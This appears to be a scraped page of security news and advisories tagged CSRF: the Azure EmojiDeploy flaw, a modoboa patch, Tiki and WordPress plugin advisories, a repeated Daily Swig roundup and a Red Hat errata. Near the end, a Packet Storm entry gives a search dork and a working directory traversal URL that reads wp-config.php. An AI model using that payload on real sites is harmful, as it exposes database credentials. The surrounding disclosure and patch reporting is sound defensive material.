A new critical remote code execution (RCE) flaw discovered impacting multiple services related to Microsoft Azure could be exploited by a malicious actor to completely take control of a targeted application.
"The vulnerability is achieved through CSRF (cross-site request forgery) on the ubiquitous SCM service Kudu," Ermetic researcher Liv Matan said in a report shared with The Hacker News. "By

Cloud Security / Data Security

A new critical remote code execution (RCE) flaw discovered impacting multiple services related to Microsoft Azure could be exploited by a malicious actor to completely take control of a targeted application.

"The vulnerability is achieved through CSRF (cross-site request forgery) on the ubiquitous SCM service Kudu," Ermetic researcher Liv Matan said in a report shared with The Hacker News. "By abusing the vulnerability, attackers can deploy malicious ZIP files containing a payload to the victim's Azure application."

The Israeli cloud infrastructure security firm, which dubbed the shortcoming **EmojiDeploy**, said it could further enable the theft of sensitive data and lateral movement to other Azure services.

Microsoft has since fixed the vulnerability as of December 6, 2022, following responsible disclosure on October 26, 2022, in addition to awarding a bug bounty of $30,000.

The Windows maker describes Kudu as the "engine behind a number of features in Azure App Service related to source control based deployment, and other deployment methods like Dropbox and OneDrive sync."

In a hypothetical attack chain devised by Ermetic, an adversary could exploit the CSRF vulnerability in the Kudu SCM panel to defeat safeguards put in place to thwart cross-origin attacks by issuing a specially crafted request to the "/api/zipdeploy" endpoint to deliver a malicious archive (e.g., web shell) and gain remote access.

The ZIP file, for its part, is encoded in the body of the HTTP request, prompting the victim application to navigate to an actor-control domain hosting the malware via the server's same-origin policy bypass.

Cross-site request forgery, also known as sea surf or session riding, is an attack vector whereby a threat actor tricks an authenticated user of a web application into executing unauthorized commands on their behalf.

"The impact of the vulnerability on the organization as a whole depends on the permissions of the applications managed identity," the company said. "Effectively applying the principle of least privilege can significantly limit the blast radius."

The findings come days after Orca Security revealed four instances of server-side request forgery (SSRF) attacks impacting Azure API Management, Azure Functions, Azure Machine Learning, and Azure Digital Twins.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Microsoft Azure Vulnerability Uncovered — Experts Warn of RCE Attacks

Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4.

@@ -16,6 +16,7 @@

from django.utils.translation import ugettext as \_, ungettext

from django.views import generic

from django.views.decorators.csrf import ensure\_csrf\_cookie

from django.views.decorators.http import require\_http\_methods

  

from modoboa.core import signals as core\_signals

from modoboa.lib.exceptions import PermDeniedException

@@ -230,6 +231,7 @@ def editdomain(request, dom\_id):

  

@login\_required

@permission\_required("admin.delete\_domain")

@require\_http\_methods(\["POST"\])

def deldomain(request, dom\_id):

keepdir \= request.POST.get("keepdir", "false") \== "true"

try:

CVE-2023-0398: Merge pull request #2752 from modoboa/fix/delete_domain_post · modoboa/modoboa@8e14ac9

Panasonic Sanyo CCTV Network Cameras versions 1.02-05 and 2.03-0x are vulnerable to CSRFs that can be exploited to allow an attacker to perform changes with administrator level privileges.

三洋電機製品のサポート情報

****

**お知らせ**

DDNSサービス終了のお知らせ

三洋電機よりご提供してまいりました「 SANYO DDNS サービス」は  
2011年9月20日をもちまして終了いたしました。  
長らくご愛顧いただきましてありがとうございました。

三洋電機株式会社

\--------------------------------------------------------------------------------

Termination of DDNS service

This DDNS service (http://www.ddns-sanyosecurity.com)  
is no longer available since September 20, 2011.

Thank you for your kind understanding.

SANYO Electric Co., Ltd.

CVE-2022-4621: 三洋電機製品のサポート情報

Cross-Site Request Forgery (CSRF) in MiKa's OSM – OpenStreetMap plugin <= 6.0.1 versions.

**Solution**

No patched version is available. No reply from the vendor.

Rasi discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress OSM – OpenStreetMap Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-30544: WordPress OSM – OpenStreetMap plugin <= 6.0.1 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

The Tickera WordPress plugin before 3.5.1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.

CVE-2022-4549

Tiki through 25.0 allows CSRF attacks that are related to tiki-importer.php and tiki-import_sheet.php.

Tiki Wiki CMS Groupware <= 25.0 Two Cross-Site Request Forgery Vulnerabilities

**• Software Link:**

https://tiki.org

**• Affected Versions:**

Version 25.0 and prior versions.

**• Vulnerabilities Description:**

1) The /tiki-importer.php script does not implement any protection against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker might force an authenticated user to import arbitrary content (wiki pages) into TikiWiki by tricking a victim user into browsing to a specially crafted web page.

2) The /tiki-import\_sheet.php script does not implement any protection against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker might force an authenticated user to import arbitrary sheets into TikiWiki by tricking a victim user into browsing to a specially crafted web page. Successful exploitation of this vulnerability requires the “Spreadsheets” feature to be enabled.

**• Solution:**

No official solution is currently available.

**• Disclosure Timeline:**

\[06/03/2022\] – Vendor notified  
\[09/01/2023\] – Public disclosure

**• CVE Reference:**

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-22852 to this vulnerability.

**• Credits:**

Vulnerabilities discovered by Egidio Romano.

CVE-2023-22852: Tiki Wiki CMS Groupware <= 25.0 Two Cross-Site Request Forgery Vulnerabilities

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Jessica Haworth 13 January 2023 at 18:31 UTC  
Updated: 16 January 2023 at 14:29 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Slack suffered a security breach recently, “involving unauthorized access to a subset of Slack’s code repositories” according to the messaging platform.

The company said that although no customers were affected, an internal investigation revealed that an unknown actor downloaded private code repositories on or around December 27.

“We discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository,” a statement read.

“No downloaded repositories contained customer data, means to access customer data or Slack’s primary codebase.”

Identity management company Okta also fell victim to a breach when an unknown actor accessed its code repositories.

The incident occurred “in early December 2022”, the vendor said, without confirming whether or not any data was stolen.

It did confirm that it “promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications”.

And over in the US, a government watchdog spent $15,000 to build a password-cracking program – only to discover employees were using easily-guessable credentials all along.

The complicated software, financed by the Department of the Interior, was designed to take on tasks such as recovering hashed passwords.

However it ultimately found that it was able to recover nearly 14,000 employee passwords, – 16% of all department accounts – due to “easily cracked passwords, lack of multifactor authentication, and other failures”.

Among other stories from The Daily Swig in recent days were secure messaging app Threema disputing the seriousness of flaws in its software, developers being urged to rotate secrets in CircleCI due to a security breach, and cross-origin resource (CORS) misconfigurations in the environments of enterprises including Tesla that left internal networks vulnerable.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Cisco / Critical / RCE, authentication bypass vulnerabilities / Disclosed with patch, January 11
*   CKEditor / Critical / CSRF vulnerability in CKEditor can lead to RCE (remote code execution) in XWiki / Patched in CKEditor Integration version 1.64.3
*   Mozilla / Moderate / Attacker could inject markup due to the fact Firefox failed to implement the unsafe-hashes CSP (content security policy) directive / Disclosed with patch, December 13
*   VMWare / Critical / Command injection, directory traversal vulnerabilities / Patched in VMWare vRealize Network Insight v6.8
*   Zoom / Medium, High / Path traversal, local privilege escalation bugs for Windows, Android, MacOS clients / Patched January

**Research and attack techniques**

*   Researchers from Sonarsource discovered a command injection vulnerability as well as an authentication bypass vulnerability in open source web-based monitoring tool Cacti which allowed unauthenticated exploitation.
*   A malicious Python file found on the PyPi repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK (software development kit) client from security firm SentinelOne, researchers at ReversingLabs have reported.
*   Also concerning PyPi, researcher Tom Forbes found 57 valid AWS keys present on the Python package index belonging to Amazon, Intel, and other organizations by scanning new packages with GitHub Actions.
*   A research team from Imperva demonstrated how they discovered a vulnerability in Google Chrome that led to the theft of sensitive files, such as crypto wallets and cloud provider credentials.
*   And Harsh Bothra from Cobalt released this handy write up on how pen testers can spot prototype pollution-style attacks.
**Bug bounty/vulnerability disclosure**

*   Researcher Matt Kunze netted a $107,500 bug bounty reward from Google for reporting vulnerabilities in the Google Home Mini smart speaker which allowed him to access the microphone on the device and make arbitrary HTTP requests on the local network.
*   Security firm CloudSek released BeVigil, a tool to enable bug bounty hunters to find and report vulnerabilities in mobile apps.
*   And hacker Jerry Gamblin published this extensive guide on the CVE year in review, featuring data on assigned vulnerabilities from the year 2022.
**New open source infosec/hacking tools**

*   GCP Goat is a vulnerable cloud infrastructure tool featuring the latest released OWASP Top 10 web application security risks and other misconfiguration, designed to help test developers test their code in a cloud environment.
*   Another cloud-based tool, PEACH is a tenant isolation framework for cloud applications to help protect against malicious actors accessing “data belonging to other customers”, for example, in cases such as ChaosDB, ExtraReplica, and AttachMe.
*   Open source tool sbom-utility has been released, an API platform for validating, querying, updating, and managing standardized SBOMs.
**For devs**

*   Exact Realty has released this blog post explaining how developers can defend against introducing cross-site request forgery (CSRF) vulnerabilities into websites.
*   Google’s Chromium project now supports the use of third-party Rust libraries from C++, and will include Rust code in the Chrome binary “within the next year”.
**For fun**

Finally, SplendidData’s bonkers bug bounty program policy was subject to online infosec scrutiny recently.

The rules date back to at least early 2021, however it still sparked a lively discussion thread on Twitter over the last week as some of its questionable terms were highlighted.

Its policy boasts guidance such as ‘we will not respond to your request’ and that the company ‘cannot guarantee’ that no legal action will be taken, even if the vulnerability was disclosed responsibly.

Unsurprisingly, this spread like wildfire on infosec Twitter with one user called TJ joking: “I like the “we MIGHT sue you, idk” aspect… adds a little excitement to life.”

RECOMMENDED Prototype pollution-like bug variant discovered in Python

Deserialized web security roundup – Slack and Okta breaches, lax US government passwords report, and more&nbsp;

Jessica Haworth 13 January 2023 at 18:31 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Slack suffered a security breach recently, “involving unauthorized access to a subset of Slack’s code repositories” according to the messaging platform.

The company said that although no customers were affected, an internal investigation revealed that an unknown actor downloaded private code repositories on or around December 27.

“We discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository,” a statement read.

“No downloaded repositories contained customer data, means to access customer data or Slack’s primary codebase.”

Identity management company Okta also fell victim to a breach when an unknown actor accessed its code repositories.

The incident occurred “in early December 2022”, the vendor said, without confirming whether or not any data was stolen.

It did confirm that it “promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications”.

And over in the US, a government watchdog spent $15,000 to build a password-cracking program – only to discover employees were using easily-guessable credentials all along.

The complicated software, financed by the Department of the Interior, was designed to take on tasks such as recovering hashed passwords.

However it ultimately found that it was able to recover nearly 14,000 employee passwords, – 16% of all department accounts – due to “easily cracked passwords, lack of multifactor authentication, and other failures”.

Among other stories from The Daily Swig in recent days were secure messaging app Threema disputing the seriousness of flaws in its software, developers being urged to rotate secrets in CircleCI due to a security breach, and cross-origin resource (CORS) misconfigurations in the environments of enterprises including Tesla that left internal networks vulnerable.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Cisco / Critical / RCE, authentication bypass vulnerabilities / Disclosed with patch, January 11
*   CKEditor / Critical / CSRF vulnerability in CKEditor can lead to RCE (remote code execution) in XWiki / Patched in CKEditor Integration version 1.64.3
*   Mozilla / Moderate / Attacker could inject markup due to the fact Firefox failed to implement the unsafe-hashes CSP (content security policy) directive / Disclosed with patch, December 13
*   VMWare / Critical / Command injection, directory traversal vulnerabilities / Patched in VMWare vRealize Network Insight v6.8
*   Zoom / Medium, High / Path traversal, local privilege escalation bugs for Windows, Android, MacOS clients / Patched January

**Research and attack techniques**

*   Researchers from Sonarsource discovered a command injection vulnerability as well as an authentication bypass vulnerability in open source web-based monitoring tool Cacti which allowed unauthenticated exploitation.
*   A malicious Python file found on the PyPi repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK (software development kit) client from security firm SentinelOne, researchers at ReversingLabs have reported.
*   Also concerning PyPi, researcher Tom Forbes found 57 valid AWS keys present on the Python package index belonging to Amazon, Intel, and other organizations by scanning new packages with GitHub Actions.
*   A research team from Imperva demonstrated how they discovered a vulnerability in Google Chrome that led to the theft of sensitive files, such as crypto wallets and cloud provider credentials.
*   And Harsh Bothra from Cobalt released this handy write up on how pen testers can spot prototype pollution-style attacks.
**Bug bounty/vulnerability disclosure**

*   Researcher Matt Kunze netted a $107,500 bug bounty reward from Google for reporting vulnerabilities in the Google Home Mini smart speaker which allowed him to access the microphone on the device and make arbitrary HTTP requests on the local network.
*   Security firm CloudSek released BeVigil, a tool to enable bug bounty hunters to find and report vulnerabilities in mobile apps.
*   And hacker Jerry Gamblin published this extensive guide on the CVE year in review, featuring data on assigned vulnerabilities from the year 2022.
**New open source infosec/hacking tools**

*   GCP Goat is a vulnerable cloud infrastructure tool featuring the latest released OWASP Top 10 web application security risks and other misconfiguration, designed to help test developers test their code in a cloud environment.
*   Another cloud-based tool, PEACH is a tenant isolation framework for cloud applications to help protect against malicious actors accessing “data belonging to other customers”, for example, in cases such as ChaosDB, ExtraReplica, and AttachMe.
*   Open source tool sbom-utility has been released, an API platform for validating, querying, updating, and managing standardized SBOMs.
**For devs**

*   Exact Realty has released this blog post explaining how developers can defend against introducing cross-site request forgery (CSRF) vulnerabilities into websites.
*   Google’s Chromium project now supports the use of third-party Rust libraries from C++, and will include Rust code in the Chrome binary “within the next year”.
**For fun**

Finally, SplendidData’s bonkers bug bounty program policy was subject to online infosec scrutiny recently.

The rules date back to at least early 2021, however it still sparked a lively discussion thread on Twitter over the last week as some of its questionable terms were highlighted.

Its policy boasts guidance such as ‘we will not respond to your request’ and that the company ‘cannot guarantee’ that no legal action will be taken, even if the vulnerability was disclosed responsibly.

Unsurprisingly, this spread like wildfire on infosec Twitter with one user called TJ joking: “I like the “we MIGHT sue you, idk” aspect… adds a little excitement to life.”

RECOMMENDED Prototype pollution-like bug variant discovered in Python

Deserialized web security roundup – Slack, Okta security breaches, lax US government passwords report, and more&nbsp;

Red Hat Security Advisory 2023-0017-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.8.56. Issues addressed include bypass, cross site request forgery, cross site scripting, denial of service, and man-in-the-middle vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.8.56 packages and security update  
Advisory ID:       RHSA-2023:0017-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0017  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2048 CVE-2022-29047 CVE-2022-30945   
                   CVE-2022-30946 CVE-2022-30948 CVE-2022-30952   
                   CVE-2022-30953 CVE-2022-30954 CVE-2022-34174   
                   CVE-2022-34176 CVE-2022-34177 CVE-2022-36881   
                   CVE-2022-36882 CVE-2022-36883 CVE-2022-36884   
                   CVE-2022-36885   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.8.56 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.8 - noarch

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.8.56. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHBA-2023:0018

Security Fix(es):

* Pipeline Shared Groovy Libraries: Untrusted users can modify some  
Pipeline libraries in Pipeline Shared Groovy Libraries Plugin  
(CVE-2022-29047)  
* Jenkins plugin: Sandbox bypass vulnerability through implicitly  
allowlisted platform Groovy files in Pipeline: Groovy Plugin  
(CVE-2022-30945)  
* Jenkins plugin: Mercurial SCM plugin can check out from the controller  
file system (CVE-2022-30948)  
* jenkins-plugin: Arbitrary file write vulnerability in Pipeline Input Step  
Plugin (CVE-2022-34177)  
* jenkins-plugin: Man-in-the-Middle (MitM) in  
org.jenkins-ci.plugins:git-client (CVE-2022-36881)  
* http2-server: Invalid HTTP/2 requests cause DoS (CVE-2022-2048)  
* Jenkins plugin: CSRF vulnerability in Script Security Plugin  
(CVE-2022-30946)  
* Jenkins plugin: User-scoped credentials exposed to other users by  
Pipeline SCM API for Blue Ocean Plugin (CVE-2022-30952)  
* Jenkins plugin: CSRF vulnerability in Blue Ocean Plugin (CVE-2022-30953)  
* Jenkins plugin: missing permission checks in Blue Ocean Plugin  
(CVE-2022-30954)  
* jenkins: Observable timing discrepancy allows determining username  
validity (CVE-2022-34174)  
* jenkins-plugin/junit: Stored XSS vulnerability in JUnit Plugin  
(CVE-2022-34176)  
* jenkins-plugin: Cross-site Request Forgery (CSRF) in  
org.jenkins-ci.plugins:git (CVE-2022-36882)  
* jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
(CVE-2022-36883)  
* jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
(CVE-2022-36884)  
* jenkins plugin: Non-constant time webhook signature comparison in GitHub  
Plugin (CVE-2022-36885)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

4. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2074855 - CVE-2022-29047 Pipeline Shared Groovy Libraries: Untrusted users can modify some Pipeline libraries in Pipeline Shared Groovy Libraries Plugin  
2103548 - CVE-2022-34176 jenkins-plugin/junit: Stored XSS vulnerability in JUnit Plugin  
2103551 - CVE-2022-34177 jenkins-plugin: Arbitrary file write vulnerability in Pipeline Input Step Plugin  
2114755 - CVE-2022-36881 jenkins-plugin: Man-in-the-Middle (MitM) in org.jenkins-ci.plugins:git-client  
2116840 - CVE-2022-36882 jenkins-plugin: Cross-site Request Forgery (CSRF) in org.jenkins-ci.plugins:git  
2116952 - CVE-2022-2048 http2-server: Invalid HTTP/2 requests cause DoS  
2119642 - CVE-2022-30945 Jenkins plugin: Sandbox bypass vulnerability through implicitly allowlisted platform Groovy files in Pipeline: Groovy Plugin  
2119643 - CVE-2022-30946 Jenkins plugin: CSRF vulnerability in Script Security Plugin  
2119644 - CVE-2022-30948 Jenkins plugin: Mercurial SCM plugin can check out from the controller file system  
2119645 - CVE-2022-30952 Jenkins plugin: User-scoped credentials exposed to other users by Pipeline SCM API for Blue Ocean Plugin  
2119646 - CVE-2022-30953 Jenkins plugin: CSRF vulnerability in Blue Ocean Plugin  
2119647 - CVE-2022-30954 Jenkins plugin: missing permission checks in Blue Ocean Plugin  
2119653 - CVE-2022-34174 jenkins: Observable timing discrepancy allows determining username validity  
2119656 - CVE-2022-36883 jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
2119657 - CVE-2022-36884 jenkins plugin: Lack of authentication mechanism in Git Plugin webhook  
2119658 - CVE-2022-36885 jenkins plugin: Non-constant time webhook signature comparison in GitHub Plugin

6. Package List:

Red Hat OpenShift Container Platform 4.8:

Source:  
jenkins-2-plugins-4.8.1672842762-1.el8.src.rpm  
jenkins-2.361.1.1672840472-1.el8.src.rpm

noarch:  
jenkins-2-plugins-4.8.1672842762-1.el8.noarch.rpm  
jenkins-2.361.1.1672840472-1.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2048  
https://access.redhat.com/security/cve/CVE-2022-29047  
https://access.redhat.com/security/cve/CVE-2022-30945  
https://access.redhat.com/security/cve/CVE-2022-30946  
https://access.redhat.com/security/cve/CVE-2022-30948  
https://access.redhat.com/security/cve/CVE-2022-30952  
https://access.redhat.com/security/cve/CVE-2022-30953  
https://access.redhat.com/security/cve/CVE-2022-30954  
https://access.redhat.com/security/cve/CVE-2022-34174  
https://access.redhat.com/security/cve/CVE-2022-34176  
https://access.redhat.com/security/cve/CVE-2022-34177  
https://access.redhat.com/security/cve/CVE-2022-36881  
https://access.redhat.com/security/cve/CVE-2022-36882  
https://access.redhat.com/security/cve/CVE-2022-36883  
https://access.redhat.com/security/cve/CVE-2022-36884  
https://access.redhat.com/security/cve/CVE-2022-36885  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8CK8NzjgjWX9erEAQg9gg//YHwlfSaT6+BEwCGZFH5+gzF/Hm4V4fXK  
pqDxCfntMnj0Wu6Oe5oSccJeSoOBGL+Ff7XQiVqp2Nei859J6ie1idOD+at85z66  
zypX4gRRc75aJimMELIZl2ycZrO7DtcWN/q3gh+tppgoashUjEqQXaBPt+5u32Ly  
LQ46UN8m3JxfLmL5Ms2rwxUmZ3ocEoFF+zrW5/XD1ulvJPinhfOgk/qwIy8/a64P  
TvYjmu9Hz+DzDmG5IaKj7ByP6oOOWbHEpmqf33tf06uM4PofXIzJU4W/YGzuqnc/  
qBNB5p40JMCPAHIlOeKnDIduNwdrg+HxJUYaNfMTi3En0eF/QEhLargSspjH0aDy  
ILKslVQLpIuZ3MOIaJYkr1BmiIALsZFdyjRfSR0Q0CVBbroMI2wmgs6DIcXPrBIZ  
76fPXx9Um8zuLYCD+s2xanH6ySCPN4pA+887aoHe055iMvZHJzLThPXCBJsTcgcA  
EcNRmxXoJve4w6/ADVsfNJ2SmCVS4VC0f3J+lRDtLxXfUS+nrC96kAalibckkNAN  
O8xKrcpqTGBR4XZK6TVjXTB/VeO+RZF1bQWMLYVn3CBZHP/t3ycVB1prai0CVGRs  
/XOP0tu5FPz+LFVCgyK88zn9eD8+JQ4WNTINLXEASJDi3ok+l67NswgmopnrY3kY  
7Er6WWwsysQ=  
=afS3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0017-01

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.9.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | b974aee33a66e29925be0ab29843b305b114f9a63e635ad75ca2c10d50af3474

Download | Favorite | View

**WordPress Slider Revolution 4.9.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.9.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/comunicacioninternacomuy/sitio/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

Tag

#csrf